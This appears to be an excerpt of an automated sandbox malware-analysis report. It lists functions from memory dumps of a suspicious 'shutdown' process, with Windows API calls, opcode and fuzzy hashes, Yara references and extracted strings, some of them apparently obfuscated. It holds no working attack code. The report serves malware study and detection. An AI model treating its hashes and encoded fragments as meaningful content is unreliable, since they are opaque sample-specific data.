                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03244942
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 06016602d0770ca522341d27ffd274018231073a67a5a0f8347fd14216fd37da
                      • Instruction ID: ed64406cdea01b3a92e0e8384889970fac11b5d9a2e99a69b34872d90fefa832
                      • Opcode Fuzzy Hash: 06016602d0770ca522341d27ffd274018231073a67a5a0f8347fd14216fd37da
                      • Instruction Fuzzy Hash: BDF08275E5420EABDB14EE95DC42F9DF3A8EF44618F0482D9EE099B140E270EA948B80
                      Function 0323971B Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03239765
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateThread
                      • String ID:
                      • API String ID: 2422867632-0
                      • Opcode ID: 7de56493fe62f160b7e9a195c7ae58a8c0bca6f66fc7dc7aefcb56ccb3a165ff
                      • Instruction ID: bd363c87f53a6d836c3eea22441a56628ce7036afe7118c02bf5bba0442692a2
                      • Opcode Fuzzy Hash: 7de56493fe62f160b7e9a195c7ae58a8c0bca6f66fc7dc7aefcb56ccb3a165ff
                      • Instruction Fuzzy Hash: EDF09B7729031036E731A6A94C41FE76B988F85761F240155F60DEF2C0D9F6B58146A5
                      Function 03258630 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F84589F4,00000007,00000000,00000004,00000000,032441AA,000000F4,?,?,?,?,?), ref: 0325866C
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: 7b89a264751e4e95cb903b6f32873bd17e7dfa8da40c9c63da6e5e9cc1a879b7
                      • Instruction ID: d3c97d8def18bb502e139ef188dfb98ee0afb24ce816ad644bbacb978b28e1f9
                      • Opcode Fuzzy Hash: 7b89a264751e4e95cb903b6f32873bd17e7dfa8da40c9c63da6e5e9cc1a879b7
                      • Instruction Fuzzy Hash: 05E06D75200208BBD610EE98DC41FAB33ADEFC5750F004408F909AB280C7B1BD5087B4
                      Function 032585E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000104,E5B4FE69,0325115C,E5B4FE69,?,0325115C,E5B4FE69,00000104,E5B4FE69), ref: 0325861F
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 02cca49e38662a387e86f34c886256fbfbf58bcc0c36bb4ecc6beab4d21673a2
                      • Instruction ID: f61abaa8f2602f5eecf71acb9105263e73f762b3fa65a9d79d32afd83a2e21a7
                      • Opcode Fuzzy Hash: 02cca49e38662a387e86f34c886256fbfbf58bcc0c36bb4ecc6beab4d21673a2
                      • Instruction Fuzzy Hash: 13E06DB5200304BBD614EF98DC41E9B73ADEFC5710F004409FA09A7281C671BA10C7B5
                      Function 03248180 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      • GetFileAttributesW.KERNELBASE(0324D478,?,?,0324D478,00000000,?), ref: 032481AC
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: b65d524594dfd763b63631b7f498ec3f3d8a8f52e4cb3aebfcaed48d9883c848
                      • Instruction ID: 28f67e3e06216c43f8ef59a5309c5bc9ec227498f2c6bd010b7774b388af53bf
                      • Opcode Fuzzy Hash: b65d524594dfd763b63631b7f498ec3f3d8a8f52e4cb3aebfcaed48d9883c848
                      • Instruction Fuzzy Hash: 61E0203157030427FB24EA7CDC81FA233485744A24F1C4650F81CCF3C1E579F5814150
                      Function 03247F90 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNELBASE(00008003,?,?,03241E00,03257097,03254977,?), ref: 03247FC3
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 84e2752809c27ab60bf4aa07ba5ed2ac725a2fee77e06e22d8040cb19d98deef
                      • Instruction ID: c20152702db432c9872a6b47f662bc986e060e87da8d4d9f0b965b4f5cdc5528
                      • Opcode Fuzzy Hash: 84e2752809c27ab60bf4aa07ba5ed2ac725a2fee77e06e22d8040cb19d98deef
                      • Instruction Fuzzy Hash: DAD05E752903043BF740FAB58C02F963A8C9B40654F194464FA1CEB2C2E9A5F1904A65
                      Function 039B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: cdf1beaa57eadee6344e5dd9b72b59f47c993d8e93d0d1083e4c4f1bfd1f4826
                      • Instruction ID: fcbd6d5c1f22b7737b8d6ffe7b8c468634a6f264dcf801446eab4f48ddcb9496
                      • Opcode Fuzzy Hash: cdf1beaa57eadee6344e5dd9b72b59f47c993d8e93d0d1083e4c4f1bfd1f4826
                      • Instruction Fuzzy Hash: DDB09B719055C5C5EA11E760470C7177A58A7D0741F19C4A5D2430641E4739C5D1E176

                      Non-executed Functions

                      Function 03C9B7AA Relevance: 57.7, Strings: 46, Instructions: 223COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2565554159.0000000003C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3c90000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                      • API String ID: 0-3754132690
                      • Opcode ID: 523daa0da8f4ff66d2731e2799678fc3fcb5e4ffe0dce2b60af0a7f21ea7dda8
                      • Instruction ID: dd5895c3d47f3d5cbf123418cd5a7e78b5c0d62fef090022c3596466af49291d
                      • Opcode Fuzzy Hash: 523daa0da8f4ff66d2731e2799678fc3fcb5e4ffe0dce2b60af0a7f21ea7dda8
                      • Instruction Fuzzy Hash: A39130F04082948ACB158F55A0652AFFFB1EBC6305F15816DE7A6BB243C3BE8905CB95
                      Function 03C92BBA Relevance: 30.1, Strings: 24, Instructions: 64COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2565554159.0000000003C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3c90000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID: `-<$"+`f$"c4$$%!-+$%#"c$%/-8$).<`$)c-<$+)c;$-+)c$-8%#$-:%*$-<< $4! `$4! w$8! g$8)48$< %/$=q|b$`%!-$c$8!$cfw=$q|bt$u`%!
                      • API String ID: 0-3499896765
                      • Opcode ID: e6b4b2ab05f9298f447de5994603ee0b5e9049708a210888d9cf51619ee37bdd
                      • Instruction ID: b933b828833450870b654e885b0ab25c788a29c13439e8e4b9e7ab1ab834a00d
                      • Opcode Fuzzy Hash: e6b4b2ab05f9298f447de5994603ee0b5e9049708a210888d9cf51619ee37bdd
                      • Instruction Fuzzy Hash: CD2164B040430DEACF19DF90E991BDEBBB0FF14304F81A14AE959AF241CA718659CB85
                      Function 039B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                      • API String ID: 48624451-2108815105
                      • Opcode ID: ecce41a6d622b4d7bb2ef8a62ef6d41134aa5001dd273f33454dc0f2dddb7365
                      • Instruction ID: f0e7189c0ddb0894a5b5587f064e925538ef68cf0a1afb8dbfccd1e9c426727a
                      • Opcode Fuzzy Hash: ecce41a6d622b4d7bb2ef8a62ef6d41134aa5001dd273f33454dc0f2dddb7365
                      • Instruction Fuzzy Hash: 7651DBB5A00256BFCB11DF98CA909BEF7BCFB49240B148969E4A9D7641D734DE40C7E0
                      Function 03A22410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                      • API String ID: 48624451-2108815105
                      • Opcode ID: f6b6dd1fa85a5c2f243693858a78e71902aee538b37508eb716873451031ed4c
                      • Instruction ID: ec7dcef1dbeefa7fc2c3d702b9a6e9d5adedf1c1d0398dc91253d00dbb991032
                      • Opcode Fuzzy Hash: f6b6dd1fa85a5c2f243693858a78e71902aee538b37508eb716873451031ed4c
                      • Instruction Fuzzy Hash: 2551D5B5A006A5AFDB70DF9CC890A7EBBF9EF44200B44C86EE496D7641E774DA40C760
                      Function 039A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                      Download Yara Rule
                      Strings
                      • Execute=1, xrefs: 039E4713
                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 039E4787
                      • ExecuteOptions, xrefs: 039E46A0
                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 039E4725
                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 039E4655
                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039E46FC
                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 039E4742
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                      • API String ID: 0-484625025
                      • Opcode ID: 352a68902c4da1d2897b3f24e0df25038ba288e1b502e8c12755d1f114da1290
                      • Instruction ID: 00fa426f0eabbc5d9d3be013aebd692fcd90f300c3396ace3c29954c8d050cc1
                      • Opcode Fuzzy Hash: 352a68902c4da1d2897b3f24e0df25038ba288e1b502e8c12755d1f114da1290
                      • Instruction Fuzzy Hash: BE511635A007197ADF21EBECDC86BEE73BCEF84344F0406A9E505AB191E7719A418F91
                      Function 03A46940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                      • Instruction ID: ec4a643fcceb6b4771c27cb00660888b56fcc3ea4dc6d8cb334ac8120b01ee8f
                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                      • Instruction Fuzzy Hash: A1021475608341AFC305CF18C994A6BBBF5EFC9700F048A2EF9999B264DB71E905CB52
                      Function 039BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: __aulldvrm
                      • String ID: +$-$0$0
                      • API String ID: 1302938615-699404926
                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                      • Instruction ID: e0946374d001b9f5be0feaf9794be80f4ab2a54296c8dcf1f6cca8223bbac884
                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                      • Instruction Fuzzy Hash: EB81CF70E052499FDF28DE68CA917FEBBBAAF453A0F1C465AD861A77D0C7349840CB50
                      Function 03A220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: %%%u$[$]:%u
                      • API String ID: 48624451-2819853543
                      • Opcode ID: 33a8c9bbfcaf12fa829dbb6fce8dc90c1ada09867ed4473d05efd8af5be2f409
                      • Instruction ID: b48394b8f68294edfdf6411c5e129a40d6c1bd56a9b0af9c40772b97e5ae015a
                      • Opcode Fuzzy Hash: 33a8c9bbfcaf12fa829dbb6fce8dc90c1ada09867ed4473d05efd8af5be2f409
                      • Instruction Fuzzy Hash: 3B213576E10229ABDB50DF7DDD40EEEBBF8EF94644F48051AE915D7201E730D9018BA1
                      Function 0399F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                      Download Yara Rule
                      Strings
                      • RTL: Re-Waiting, xrefs: 039E031E
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039E02BD
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039E02E7
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                      • API String ID: 0-2474120054
                      • Opcode ID: 1e657f2c4dc9fdc8385e66d91c4ffa1b89bc64eb53a93f876f5192fa2abce61f
                      • Instruction ID: 70ced97042af3d4b37831f12c1d691a3fc42fa27b17dd22d6f6573cc939a49d4
                      • Opcode Fuzzy Hash: 1e657f2c4dc9fdc8385e66d91c4ffa1b89bc64eb53a93f876f5192fa2abce61f
                      • Instruction Fuzzy Hash: F4E1BD346047419FEB25CF2DC884B6AF7E8BB88354F180A5AE4A6CB3E1D774D845CB52
                      Function 039ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                      Download Yara Rule
                      Strings
                      • RTL: Re-Waiting, xrefs: 039E7BAC
                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 039E7B7F
                      • RTL: Resource at %p, xrefs: 039E7B8E
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                      • API String ID: 0-871070163
                      • Opcode ID: ea59b6d81f06acd1af6fb7b70dad980175ee96f2d759fd2086349a72024ddb61
                      • Instruction ID: ea2dfa4246fb675db8f650a7b2753c70014488ce16d3964792a363792a7a6ce3
                      • Opcode Fuzzy Hash: ea59b6d81f06acd1af6fb7b70dad980175ee96f2d759fd2086349a72024ddb61
                      • Instruction Fuzzy Hash: B841E235304B029FC724DE69C940B6AB7E9EF88760F180A1DF95A9B680DB31E8058BD1
                      Function 039AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                      Download Yara Rule
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 039E728C
                      Strings
                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 039E7294
                      • RTL: Re-Waiting, xrefs: 039E72C1
                      • RTL: Resource at %p, xrefs: 039E72A3
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                      • API String ID: 885266447-605551621
                      • Opcode ID: 775b5b5745133d21254d2cf7b5dd7b7e191c1ac7c796af5c8cb0c8449e49a15b
                      • Instruction ID: 360da0b16a8fce9359897737ea118165dac87e64c4f77f5b9cb9ae4664e96534
                      • Opcode Fuzzy Hash: 775b5b5745133d21254d2cf7b5dd7b7e191c1ac7c796af5c8cb0c8449e49a15b
                      • Instruction Fuzzy Hash: E441CF35700706AFD721DE69CC41B6AB7A9FB84750F140A19F955AB340DB31E84287D2
                      Function 03A22300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: %%%u$]:%u
                      • API String ID: 48624451-3050659472
                      • Opcode ID: 37996fef19f88dcc5a3218a2dc48ec4dbb7dca8a1f6aebf8dc1930510737812d
                      • Instruction ID: b3106b339faf9d20e631dbecab66a4fa5e852c09d8fe0d275e21fa626e91ecb6
                      • Opcode Fuzzy Hash: 37996fef19f88dcc5a3218a2dc48ec4dbb7dca8a1f6aebf8dc1930510737812d
                      • Instruction Fuzzy Hash: DB316676A102299FDB60DF2DCD40FEEB7F8EF44610F44455AE849E7241EB30EA459BA0
                      Function 039B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: __aulldvrm
                      • String ID: +$-
                      • API String ID: 1302938615-2137968064
                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                      • Instruction ID: 4a15255d2160af2b202b489184997122c819f064de34afb088a9983c607fe85f
                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                      • Instruction Fuzzy Hash: 0891A671E002169BDF24DEA9CA806FEB7B9EFC47A0F18471AE865EB2D0D73099408714
                      Function 03979126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID: $$@
                      • API String ID: 0-1194432280
                      • Opcode ID: de7b9d795fc357cdcbd6aa208658a6401657d692b3e2212c572364c75e098782
                      • Instruction ID: cf16b4470d076be48e01553c66e25957e5aa62c5fa14d1c4c0431ccd5c2dbf60
                      • Opcode Fuzzy Hash: de7b9d795fc357cdcbd6aa208658a6401657d692b3e2212c572364c75e098782
                      • Instruction Fuzzy Hash: C1811875D002699BDB31DF54CC45BEEB7B8AB48750F0485EAE919B7280E7309E85CFA0
                      Function 039FCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                      Download Yara Rule
                      APIs
                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 039FCFBD
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: CallFilterFunc@8
                      • String ID: @$@4_w@4_w
                      • API String ID: 4062629308-713214301
                      • Opcode ID: c10a19d300c7ce539456387ec2820231830a0b948dad4d5aed2dc284c6643bfc
                      • Instruction ID: a01887efed3650cc55f1d68bed059d73ca6022065f2d49a9343bfb25e359c4ad
                      • Opcode Fuzzy Hash: c10a19d300c7ce539456387ec2820231830a0b948dad4d5aed2dc284c6643bfc
                      • Instruction Fuzzy Hash: 65419475900218EFCB21EFA9C840A6DFBB8FF95B00F04442AEA15DF265D734D901CB65